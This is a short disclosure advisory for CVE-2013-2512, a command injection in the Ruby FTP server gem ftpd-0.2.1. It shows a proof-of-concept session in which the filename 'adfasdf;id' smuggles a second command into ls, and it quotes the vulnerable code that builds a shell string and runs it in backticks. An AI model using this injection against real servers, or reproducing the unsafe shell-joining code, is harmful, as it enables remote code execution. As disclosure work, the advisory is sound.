Advisory #: 34
Title: Remote command execution for Ruby Gem ftpd-0.2.1
Author: Larry W. Cashdollar, @_larry0
Date: 2013-02-18
[CVE-2013-2512]
Download Site: http://rubygems.org/gems/ftpd
Vendor:
Vendor Notified: 2013-02-18
Vendor Contact: https://github.com/wconrad
Advisory: http://www.vapid.dhs.org/advisories/ftp-0.2.1-remote-exec.htmlhttp://www.vapid.dhs.org/advisories/ftp-0.2.1-remote-exec.html
Description: ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It an be used as part of a test fixture or embedded in a program.
Vulnerability:
The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on 0.0.0.0. PoC: for this to work the file must exist in the CWD. ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh Connected to localhost. 220 ftpd Name (localhost:root): 331 Password required Password: 230 Logged in Remote system type is UNIX. Using binary mode to transfer files. * I created the filename adfasdf ftp> ls adfasdf;id 200 PORT command successful 150 Opening ASCII mode data connection -rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf uid=0(root) gid=0(root) groups=0(root) 226 Transfer complete ftp>
Export: JSON TEXT XML
Exploit Code:
  1. ./ftpd-0.2.1/lib/ftpd/disk_file_system.rb
  2.  
  3. The problem code is below
  4.  
  5. 204 Ls interface used by List and NameList 205
  6. 206 module Ls
  7. 207
  8.  
  9. 208 def ls(ftp_path, option)
  10. 209 path = expand_ftp_path(ftp_path)
  11. 210 dirname = File.dirname(path)
  12. 211 filename = File.basename(path)
  13. 212 command = [
  14. 213 'ls',
  15. 214 option,
  16. 215 filename, <-- ;cmd inject
  17. 216 '2>&1',
  18. 217 ].compact.join(' ')
  19. 218 if File.exists?(dirname) <- file has to exist to exec ls command
  20. 219 list = Dir.chdir(dirname) do
  21. 220 `{command}` <-- exec
  22.  
Screen Shots:
Notes: 90784